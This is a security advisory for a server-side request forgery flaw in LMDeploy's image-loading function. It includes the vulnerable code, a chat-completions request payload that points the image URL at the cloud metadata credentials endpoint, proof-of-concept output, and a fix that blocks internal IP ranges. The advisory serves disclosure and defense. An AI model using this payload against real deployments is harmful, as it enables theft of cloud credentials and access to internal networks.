PT-2026-59261 · Pypi · Lmdeploy
Published
2026-07-13
·
Updated
2026-07-13
CVSS v3.1
7.5
High
| Vector | AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N |
Summary
A Server-Side Request Forgery (SSRF) vulnerability exists in LMDeploy's vision-language module. The
load image() function in lmdeploy/vl/utils.py fetches arbitrary URLs without validating internal/private IP addresses, allowing attackers to access cloud metadata services, internal networks, and sensitive resources.Affected Versions
- Tested on: main branch (2026-02-04)
- Affected: All versions prior to 0.12.3
Vulnerable Code
File:
lmdeploy/vl/utils.py (lines 64-67)python
def load image(image url: Union[str, Image.Image]) -> Image.Image:
# ...
if image url.startswith('http'):
response = requests.get(image url, headers=headers, timeout=FETCH TIMEOUT)
# NO VALIDATION OF URL/IP BEFORE REQUESTAlso affected:
encode image base64() function (lines 26-29)Root Cause
- No validation of URLs before fetching
- No blocklist for internal IPs (127.0.0.1, 169.254.x.x, 10.x.x.x, 192.168.x.x)
- Server binds to
0.0.0.0by default (api server.py line 1393) - API keys disabled by default
Attack Scenario
- LMDeploy server deployed with vision-language model
- Attacker sends request to
/v1/chat/completionswith maliciousimage url:
python
POST /v1/chat/completions
{
"model": "internlm-xcomposer2",
"messages": [{
"role": "user",
"content": [
{"type": "text", "text": "Describe this image"},
{"type": "image url", "image url": {"url": "http://169.254.169.254/latest/meta-data/iam/security-credentials/"}}
]
}]
}- Server fetches URL without validation
- Attacker receives cloud credentials
Proof of Concept
Verified Exploitation Result
╔═══════════════════════════════════════════════════════════════════════╗
║ LMDeploy SSRF Vulnerability - Proof of Concept ║
╚═══════════════════════════════════════════════════════════════════════╝
[1] Starting callback server on port 8889...
[2] Attacker URL: http://127.0.0.1:8889/SSRF PROOF?stolen data=AWS SECRET KEY
[3] Calling vulnerable load image() function...
======================================================================
[+] SSRF CALLBACK RECEIVED!
======================================================================
Time: 2026-02-04 16:10:57
Path: /SSRF PROOF?stolen data=AWS SECRET KEY
Client: 127.0.0.1:51154
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64)...
======================================================================
✅ SSRF VULNERABILITY CONFIRMED!Impact
- Cloud Credential Theft: Access AWS/GCP/Azure metadata APIs
- Internal Service Access: Reach services not exposed to internet
- Information Disclosure: Port scan internal networks
- Lateral Movement: Pivot point for further attacks
Recommended Fix
python
from urllib.parse import urlparse
import ipaddress
import socket
BLOCKED NETWORKS = [
ipaddress.ip network('127.0.0.0/8'),
ipaddress.ip network('10.0.0.0/8'),
ipaddress.ip network('172.16.0.0/12'),
ipaddress.ip network('192.168.0.0/16'),
ipaddress.ip network('169.254.0.0/16'),
]
def is safe url(url: str) -> bool:
try:
parsed = urlparse(url)
if parsed.scheme not in ('http', 'https'):
return False
ip = socket.gethostbyname(parsed.hostname)
ip addr = ipaddress.ip address(ip)
return not any(ip addr in network for network in BLOCKED NETWORKS)
except:
return FalseCredit
This vulnerability was discovered as part of Orca Security's research.
Researcher: Igor Stepansky
Organization: Orca Security
Emails:
igor.stepansky@orca.security
iggy.p0pi@orca.security
Fix
Found an issue in the description? Have something to add? Feel free to write us 👾
Related Identifiers
Affected Products
Lmdeploy